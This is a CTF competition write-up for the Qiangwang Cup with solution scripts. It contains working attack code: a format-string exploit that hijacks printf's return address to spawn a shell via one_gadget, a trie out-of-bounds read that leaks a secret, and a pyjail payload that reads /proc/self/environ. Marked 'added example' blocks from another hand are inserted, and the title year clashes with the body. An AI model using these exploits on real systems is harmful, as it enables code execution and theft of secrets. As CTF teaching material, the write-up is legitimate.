
lmarch2


HASHTEAM 强网杯 (Qiangwang Cup) 2024 write-up

2023 强网杯

强网杯 was a total grind: I couldn't do the pwn challenges at all, so I could only paddle around in the 强网先锋 (Pioneer) track....
Far too weak; back again next year!

Crypto

Not only rsa

Straightforward one; here is the code directly:

# Sage script: Zmod(n) and nth_root(e, all=True) enumerate every e-th root of c modulo n
# (p is given by the challenge but the script does not need it); the root whose byte
# form contains b'flag' is the message.
from Crypto.Util.number import *
from tqdm import tqdm
n = 6249734963373034215610144758924910630356277447014258270888329547267471837899275103421406467763122499270790512099702898939814547982931674247240623063334781529511973585977522269522704997379194673181703247780179146749499072297334876619475914747479522310651303344623434565831770309615574478274456549054332451773452773119453059618433160299319070430295124113199473337940505806777950838270849
e = 641747
c = 730024611795626517480532940587152891926416120514706825368440230330259913837764632826884065065554839415540061752397144140563698277864414584568812699048873820551131185796851863064509294123861487954267708318027370912496252338232193619491860340395824180108335802813022066531232025997349683725357024257420090981323217296019482516072036780365510855555146547481407283231721904830868033930943
p=91027438112295439314606669837102361953591324472804851543344131406676387779969
F=Zmod(n)

root=F(c).nth_root(e,all=True)
#print(root[0])
for i in tqdm(root):
    m=long_to_bytes(int(i))
    if b'flag' in m:
        print(m)
       

[flag screenshot]

Babyrsa

A paper-based challenge; after a long search I found https://www.sciencedirect.com/science/article/pii/S0304397523002116

Below is my attempt at reproducing it, but in the end it did not produce a solution.

# Sage script (^ is exponentiation, Zmod/PolynomialRing/LLL are Sage). Inside small_roots
# the names x, y, e and t refer to the module-level values defined further down.
from math import floor

N=6898173619848064713447564687612858995735894135343384489074201607621085283538310939996931861826971767108397996532717248188385645126212591434896047930808649179911798954640222107637439329674735608839417381358005576992626135001753481619659559186340117078191830600433093397242376731829372681835293083621809
e=18607371079843502780378872043757955319820913116247483798885064959406363250603378245586504841113742273225193107044375347430381173075888621199154655015790594262611354939631226770280837471203456810631351598504038204190312822325230950609345436371947238885587725399278901711345945547722129359115083215511568569473191308964154024336081584451627244805369215138746534093267741448684155642482008850649100654786552416480077517243070018360909360575406706389289250072987726362674233556989150088794863182955760986933773623415912617726008667185604638388708370787554333594517677850758769655741063461283985588988450577
# N=611402847577596838649117628567007514815745193613363898749361
# e=256620536587836325389289742308993660982466972819568896656661249105081887104266414292000389611061562475252796784804753727

def small_roots(f, bounds, m, d=None):
    monomials=[]
    pols=[]
    
    if not d:
        d = f.degree()

    R = f.base_ring()
    N = R.cardinality()

    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)

    G = Sequence([], f.parent())
    for s in range(m + 1):
        for i in range(s,m+1):
            for j in range(2*s,2*s+2):
                base = x ^ (i - s)* y ^(j-2*s) * f ^ s * e ^ (m - s)
                G.append(base)
                
    for s in range(m + 1):
        for i in range(s,s+1):
            for j in range(2*s+2,2*s+t+1):
                base = x ^ (i - s)* y ^(j-2*s) * f ^ s * e ^ (m - s)
                G.append(base)
                
    for poly in G:          
        for v in poly.monomials():
            if v not in monomials:
                monomials.append(v)
    
    print(len(G))
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)

    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)

    print(B.nrows(),B.ncols())
    
    B = B.dense_matrix().LLL()

    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1 / factor)

    
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B * monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots

    return []

alpha=1.997
beta=0.1
delta=0.678

r=100
m=4
t=4
FF=Zmod(2^r)
u=FF(N).nth_root(2,all=True)
print("u=",u)
#u0=63161
u0=603393209736955919317955738297
v0=2*u0+(N-u0^2)*inverse_mod(u0,2^(2*r))%2^(2*r)
print("v0=",v0)
#v0=200472128882
#v0=1567679278734573458233752031864430279097731087941138563289698
a1=v0*inverse_mod(2^(2*r-1),e)%e
print(a1)
a2=(v0^2-(N+1)^2)*inverse_mod(2^(4*r),e)%e
print(a2)
a3=(-1)*inverse_mod(2^(4*r),e)%e
print(a3)
X=floor(2*N^(alpha+delta-2))
Y=floor(3*N^(0.5-2*beta))
print('X',X)
print("Y",Y)

F.<x,y>=PolynomialRing(ZZ)
f=x*y^2+a1*x*y+a2*x+a3
res=small_roots(f,(X,Y),m)
print(res)

Misc

Happy Chess | SOLVED | 1r0ny

By sheer coincidence, a few weeks earlier I had watched a Bilibili video about a flip-the-pieces puzzle.

The approach is as follows:

First, for the initial board, clicking every position that holds a white piece (or every one that holds a black piece) turns the whole board one colour.

But the rule is to win 10 rounds within 240 moves, so each round has a move budget: a round has to be won in roughly 24 moves.

So the move sequence has to be optimised; the idea is:

On the 9*9 board, flipping an entire row or an entire column flips the whole board.

So each feasible solution can be shortened by inspection.

Once each round's sequence is trimmed to 24 moves or fewer, just play through:

Using the optimisation principle from the Bilibili video, I played 10 rounds by hand, each within 24 moves, and got the flag.

[flag screenshot]

Since there was plenty of time I optimised by hand, but it could also be brute-forced with a script: there are 9+9=18 rows and columns that can be flipped, so there are $$2^{18}$$ candidate solutions; enumerate them all in code and pick the one with the fewest points.
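An added example (my code, not the write-up's): a Python model of the 9x9 board in which one click flips its whole row and column, which is my reading of the rule described above. It checks the two observations (clicking every black cell makes the board uniform; clicking a full row flips the whole board) and runs the 2^18 row/column enumeration the write-up proposes to shrink a click set. The board is constructed here by scrambling an empty board, which guarantees it is solvable.

```python
N = 9
ALL = (1 << N * N) - 1                 # board as an 81-bit mask, set bit = black

def cell(r, c):
    return 1 << (r * N + c)

def cross(r, c):
    """Cells flipped by one click at (r, c): its whole row and whole column."""
    m = 0
    for k in range(N):
        m |= cell(r, k) | cell(k, c)
    return m

def play(board, clicks):
    """Apply every click in the mask `clicks` to the board mask."""
    for i in range(N * N):
        if clicks >> i & 1:
            board ^= cross(i // N, i % N)
    return board

def is_uniform(board):
    return board in (0, ALL)

def toggle_table(masks):
    """XOR of every subset of the nine masks, indexed by a 9-bit subset number."""
    table = [0] * (1 << N)
    for s in range(1, 1 << N):
        low = s & -s
        table[s] = table[s ^ low] ^ masks[low.bit_length() - 1]
    return table

# ROWS[1 << i] is "click every cell of row i"; COLS[1 << j] likewise for column j
ROWS = toggle_table([sum(cell(i, k) for k in range(N)) for i in range(N)])
COLS = toggle_table([sum(cell(k, j) for k in range(N)) for j in range(N)])

def minimize(clicks):
    """Sparsest of the 2^18 click sets reached by toggling whole rows/columns."""
    best, best_n = clicks, bin(clicks).count("1")
    for a in range(1 << N):
        partial = clicks ^ ROWS[a]
        for b in range(1 << N):
            n = bin(partial ^ COLS[b]).count("1")
            if n < best_n:
                best, best_n = partial ^ COLS[b], n
    return best

# constructed board: scramble an empty board with four clicks, so it is solvable;
# clicking every black cell (the mask BOARD itself) is the write-up's first solution
BOARD = play(0, cell(0, 0) | cell(3, 4) | cell(8, 8) | cell(2, 7))
```

`minimize(BOARD)` returns a click set no larger than the four clicks used to scramble the board, since every row/column toggle of a winning set is still winning.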

Pyjail ! It's myFILTER !!!

Read the environment variables to get the flag:

{print(open("/proc/self/environ").read())}

强网先锋 (Pioneer track)

Rock-paper-scissors?

The model's output is deterministic for identical input, so first fix the first five moves, then brute-force one round at a time.

####### 180
import random
from pwn import *

def main():
    # target host and port
    ip = '8.147.133.95'#'8.147.135.248'
    port = 19260#39167
    context(log_level = 'debug',os = 'linux')
    # known-winning prefix; one new guess is appended per run and corrected from the result
    #choice = [0, 0, 0, 0, 0, 1, 1, 2, 2, 0, 1, 2, 0, 2, 0, 2, 1, 0, 2, 1, 1, 0, 0, 1, 1, 1,2]
    choice=[0, 0, 0, 0, 0, 1, 1, 2, 2, 0, 1, 2, 0, 2, 0, 2, 1, 0, 2, 1, 1, 0, 0, 1, 1, 1, 2, 2, 2, 0, 0, 1, 2, 0, 0, 2, 2, 1, 1, 0, 1, 2, 0, 1, 0, 1, 0, 2, 1, 2, 2, 0, 2, 1, 0, 0, 2, 2, 1, 1, 0, 1, 0, 1, 2, 0, 2, 0, 2, 1, 0, 2, 1, 0, 0, 1, 1, 1, 2, 2, 1, 0, 1, 2, 2, 0, 1, 2, 0, 2, 0, 1, 1, 0]
    sock = remote(ip, port)
    response = sock.recvuntil('++++++++++++++++++++++++++++++++++++++++++++++++++'.encode())
    with open('replay.txt', 'w') as f:
        choice.append(random.randint(0,2))
        print(choice)
        for i in range(len(choice)):
            sock.sendlineafter('请出拳(0 - 石头,1 - 剪刀,2 - 布):'.encode(),str(choice[i]).encode())
            response = sock.recv(0x110).decode()
            f.write(response + '\n')
            if(i < 5):
                continue
            if 'Me10n赢了' in response:
                print(i,choice[i])
                print(choice)
                print((choice[i]+1)%3)
                break
            elif '平局' in response:
                print(i,choice[i])
                print(choice)
                print((choice[i]+2)%3)
                break
        sock.interactive()
    # close the connection
    sock.close()

if __name__ == '__main__':
    main()
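The replay loop above in an offline form, as an added example that is not the write-up's script: `opponent` is a constructed stand-in for the challenge's model (a hash of our previous moves, chosen only so that identical histories give identical replies), and the five fixed opening moves are dropped because the stand-in needs none. Each replay extends the known-winning prefix by one guess and corrects it from the outcome, exactly as the socket loop does.

```python
import hashlib

ROCK, SCISSORS, PAPER = 0, 1, 2      # the challenge's encoding of the three moves

def outcome(mine, theirs):
    """'win', 'draw' or 'lose' for us, in the 0/1/2 encoding above."""
    if mine == theirs:
        return "draw"
    return "win" if mine == (theirs + 2) % 3 else "lose"

def opponent(history):
    """Constructed stand-in for the challenge model: a deterministic function of
    our previous moves only, so identical histories always get identical replies."""
    return hashlib.sha256(bytes(history)).digest()[0] % 3

def play_game(moves):
    """Play our fixed move list; return (rounds won, result of the first non-win)."""
    for i, m in enumerate(moves):
        res = outcome(m, opponent(moves[:i]))
        if res != "win":
            return i, res
    return len(moves), "win"

def learn_winning_sequence(rounds, guess=ROCK):
    """The write-up's loop: replay the known-winning prefix plus one guess; when the
    guess draws or loses, the outcome reveals the opponent's move for that round."""
    moves, games = [], 0
    while len(moves) < rounds:
        i, res = play_game(moves + [guess])
        games += 1
        if res == "win":
            moves.append(guess)
        else:                                 # i == len(moves): the prefix still wins
            theirs = guess if res == "draw" else (guess + 2) % 3
            moves.append((theirs + 2) % 3)    # play what beats it on the next replay
    return moves, games
```

The service-side fix is the mirror image: mix per-session secret randomness into the model's choice so that a replayed history no longer reproduces the same reply.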

Speedup

First look at the first 20 terms:

from math import floor, factorial
from tqdm import tqdm
n=0
l=[]
for i in range(1,21):
    n=0
    result = factorial(2**i)   # 2**i so this also runs outside Sage (2^i is XOR in plain Python)
    res=str(result)
    for j in res:
        n+=int(j)
    print(n)
    l.append(n)
print(l)

Enter the sequence at https://oeis.org/, count to the 27th term, and md5 it to get the answer.

Or use Legendre's theorem to factor (2^27)!:

n=2**27
faclist=[]
for p in tqdm(range(2,n)):
    if is_prime(p):            # Sage's is_prime; run this part in Sage
        k=1
        res=0
        while True:
            m=pow(p,k)
            if n>=m:
                res+=n//m      # Legendre: floor(n / p^k), kept in exact integers
            else:
                break
            k+=1
        faclist.append((p,res))
        
# faclist=str(faclist)
# with open('test.txt', 'w') as f:     
#     f.write(faclist)

res=1
for i in tqdm(faclist):
    res*=pow(i[0],i[1])
    
n=0
for i in str(res):
    n+=int(i)
print(n)

Then compute from there.
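Legendre's formula from the second approach, as an added example (not the write-up's code) in plain Python: the exponent of each prime in n!, the reconstruction of n! from those prime powers, and the digit-sum sequence the first snippet computes, checked against math.factorial at small sizes rather than at 2^27, where the product itself has roughly a billion digits.

```python
from math import factorial

def legendre_exponent(n, p):
    """Exponent of the prime p in n!: n//p + n//p^2 + ... (Legendre's formula)."""
    e, q = 0, p
    while q <= n:
        e += n // q            # integer division stays exact for large n
        q *= p
    return e

def primes_up_to(n):
    """Plain sieve of Eratosthenes; enough for the small n used in the checks."""
    if n < 2:
        return []
    sieve = bytearray([1]) * (n + 1)
    sieve[0] = sieve[1] = 0
    for i in range(2, int(n ** 0.5) + 1):
        if sieve[i]:
            sieve[i * i::i] = bytearray(len(range(i * i, n + 1, i)))
    return [i for i, is_p in enumerate(sieve) if is_p]

def factorial_from_legendre(n):
    """Rebuild n! as the product of p**legendre_exponent(n, p) over primes p <= n."""
    result = 1
    for p in primes_up_to(n):
        result *= p ** legendre_exponent(n, p)
    return result

def digit_sum(x):
    return sum(int(d) for d in str(x))

def pow2_factorial_digit_sums(k):
    """Digit sums of (2^i)! for i = 1..k, the sequence the write-up looks up on OEIS."""
    return [digit_sum(factorial(2 ** i)) for i in range(1, k + 1)]
```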

easyfuzz

At the start I found that 9 characters plus \n could set the first two positions to 11, so I tried enumerating all possible characters.

Adjust the input string, brute-forcing position by position starting from the last one (change `repeat` in the code one step at a time).

from Excalibur import *   # the author's helper module providing remo/sl/ru/ia

import itertools
import string

def generate_strings():
    # character set to draw from
    characters = string.ascii_letters + string.digits + string.punctuation

    # every possible string of `repeat` characters (3 here); with the fixed
    # 'wbGood' suffix this makes the 9-character input
    all_combinations = itertools.product(characters, repeat=3)

    # yield the strings one at a time
    for combination in all_combinations:
        yield ''.join(combination)

# fetch strings one by one from the generator
string_generator = generate_strings()

#contextset()
remo('101.200.122.251',12199,1)
#remo('101.200.122.251',12188,1)

for _ in range(1000):
    payload = next(string_generator) + 'wbGood'
    sl(payload)
    ru(b'code')
    m = ru(b'\n')
    if not b'110000000' in m:
        print(payload, m)

#sl(b'1'*9)
#sl(b'\xff\xff\xff\xff\xff\xff\xff\xff\xff')
ia()

qwb

Trie

Done by hand; a script would be faster.

First, work out the program logic: IPs are stored in a trie, and during lookup, by controlling the value of v3 you can read past the end array out of bounds and read the flag out of secret.

Debugging showed that tot is incremented by 1 for every node inserted into the tree, so first make tot 0x40, then control the IP (dropping one 1-bit at a time in its binary form) so that tot increases by 4 each time, which reads the flag out 4 bytes at a time. (Note that tot is multiplied by 4.)

from Excalibur import *

#proc('./trie')
remo('47.104.150.173',1337,1)
contextset()

'''
for i in range(100):
    ip1 = '192.168.1.'+(str(i))
    sla(b'Quit.',b'1')
    sla(b'IP:',ip1)
    ip2 = '192.168.1.'+str(i+1)
    sla(b'hop:',ip2)

sla(b'Quit.',b'2')
'''
def setip(ip1,ip2):
    sla(b'Quit.',b'1')
    sla(b'IP:',ip1)
    sla(b'hop:',ip2)

def show(ip):
    sla(b'Quit.',b'3')
    sla(b'Quit.',b'2')
    sla(b'IP:',ip)
    ru(b'is')
    flag = ru(b'\n')
    print(flag)
    pause()
debug('b *$rebase(0x4060)\nb *$rebase(0x1619)\n')
setip(b'0.0.0.0',b'0.0.0.0')#+0x20
setip(b'255.255.255.255',b'0.0.0.0')#+0x20

#setip(b'127.255.255.255',b'0.0.0.0')#+0x4
#setip(b'63.255.255.255',b'0.0.0.0')#+0x4
#setip(b'31.255.255.255',b'0.0.0.0')#+0x4
#setip(b'15.255.255.255',b'0.0.0.0')#+0x4
#setip(b'7.255.255.255',b'0.0.0.0')#+0x4
#setip(b'3.255.255.255',b'0.0.0.0')#+0x4
#setip(b'1.255.255.255',b'0.0.0.0')#+0x4
#setip(b'0.255.255.255',b'0.0.0.0')#+0x4
#setip(b'0.127.255.255',b'0.0.0.0')#+0x4
#setip(b'0.63.255.255',b'0.0.0.0')#+0x4
setip(b'0.31.255.255',b'0.0.0.0')#+0x4

#setip(b'0.255.255.255',b'0.0.0.0')#+0x4
#show(b'127.255.255.255')
#show(b'63.255.255.255')
#show(b'31.255.255.255')
#show(b'15.255.255.255')
#show(b'7.255.255.255')
#show(b'3.255.255.255')
#show(b'1.255.255.255')
#show(b'0.255.255.255')
#show(b'0.127.255.255')
#show(b'0.63.255.255')
show(b'0.31.255.255')

ia()
numbers = "0.0.0.125.115.121.117.103.95.117.48.121.95.115.64.95.103.110.48.114.116.115.95.53.97.95.51.109.48.99.51.66.95.48.116.95.119.48.72.123.103.97.108.102"
reversed_numbers = numbers.split(".")[::-1]
ascii_chars = [chr(int(num)) for num in reversed_numbers]

result = "".join(ascii_chars)
print(result)

[flag screenshot]

ez_fmt

Overwrite printf's return address to hijack control flow while leaking a libc address, then on the second printf overwrite the return address with the one_gadget. The write can't be done in one go with `ln` here, or it would be extremely slow.

from evilblade import *

context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')
libset('./libc-2.31.so')
#libset('./libc.so.6')
evgdb()
rsetup('47.104.24.40', 1337)

stack = getx(-15,-1)
stack1 = stack - 8
dx(stack1)

# overwrite printf's return address

sd(b'%4198556c'+b'%19$paaa'+b'aaa%9$n'+p64(stack1))

libc = getx(-65,-51)
base = getbase(libc,'__libc_start_main',243)
os = base + 0xe3b01

os1 = os %0x10000
os2 = os %0x1000000
os2 = os2 >> 16
dx(stack)
dx(os)

pay1 = f'%{os2-4}c'.encode().ljust(8,b'a')
pay2 = f'%{os1-os2-3}c'.encode().ljust(8,b'a')
print(pay1)
pay = pay1 + b'a%11$hhn'+ pay2 +b'aa%10$hn' +p64(stack-232)+p64(stack-230)
print(len(pay))
pause()
sl(pay)
ia()
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''

[flag screenshot]

Author: lmarch2

Link: https://www.cnblogs.com/imarch22/p/18007186

License: this work is licensed under the Creative Commons Attribution-NonCommercial-NoDerivatives 2.5 China Mainland License.
